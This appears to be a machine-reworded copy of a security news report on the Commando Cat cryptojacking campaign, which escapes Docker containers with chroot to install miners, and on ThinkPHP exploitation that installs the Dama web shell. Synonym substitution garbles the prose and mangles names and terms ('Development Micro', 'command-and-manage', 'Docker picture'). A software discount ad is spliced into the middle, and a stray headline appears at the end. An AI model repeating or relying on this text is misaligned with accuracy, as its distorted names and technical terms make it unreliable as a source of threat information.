The threat actor known as Commando Cat has been joined to an ongoing cryptojacking attack marketing campaign that leverages inadequately secured Docker instances to deploy cryptocurrency miners for economic gain.
“The attackers made use of the cmd.cat/chattr docker picture container that retrieves the payload from their have command-and-manage (C&C) infrastructure,” Development Micro researchers Sunil Bharti and Shubham Singh mentioned in a Thursday analysis.
Commando Cat, so named for its use of the open-source Commando undertaking to create a benign container, was 1st documented previously this calendar year by Cado Security.
Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.
Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).
➤ Activate Your Coupon Code
The attacks are characterized by the concentrating on of misconfigured Docker remote API servers to deploy a Docker impression named cmd.cat/chattr, which is then applied as a foundation to instantiate a container and break out of its confines making use of the chroot command, and get accessibility to the host operating program.
The last action involves retrieving the malicious miner binary utilizing a curl or wget command from a C&C server (“leetdbs.anondns[.]net/z”) by usually means of a shell script. The binary is suspected to be ZiggyStarTux, an open-source IRC bot primarily based on the Kaiten (aka Tsunami) malware.
“The significance of this attack campaign lies in its use of Docker illustrations or photos to deploy cryptojacking scripts on compromised methods,” the scientists explained. “This tactic allows attackers to exploit vulnerabilities in Docker configurations while evading detection by security software.”
The disclosure comes as Akamai unveiled that a long time-outdated security flaws in ThinkPHP purposes (e.g., CVE-2018-20062 and CVE-2019-9082) are being exploited by a suspected Chinese-talking risk actor to deliver a web shell dubbed Dama as aspect of a marketing campaign that has been underway due to the fact Oct 17, 2023.
“The exploit attempts to retrieve supplemental obfuscated code from one more compromised ThinkPHP server to gain first foothold,” Akamai scientists Ron Mankivsky and Maxim Zavodchik reported. “Following efficiently exploiting the process, the attackers will install a Chinese language web shell named Dama to preserve persistent access to the server.”
The web shell is outfitted with quite a few sophisticated abilities to obtain method knowledge, upload files, scan network ports, escalate privileges, and navigate the file method, the latter of which enables danger actors to carry out functions like file enhancing, deletion, and timestamp modification for obfuscation needs.
“The the latest attacks originated by a Chinese-speaking adversary emphasize an ongoing craze of attackers employing a absolutely fledged web shell, made for sophisticated victim handle,” the scientists pointed out. “Interestingly, not all targeted customers had been using ThinkPHP, which implies that the attackers might be indiscriminately concentrating on a broad assortment of techniques.”
Identified this article intriguing? Observe us on Twitter and LinkedIn to examine a lot more special information we submit.
Some sections of this short article are sourced from:
thehackernews.com
Muhstik Botnet Exploiting Apache RocketMQ Flaw to Expand DDoS Attacks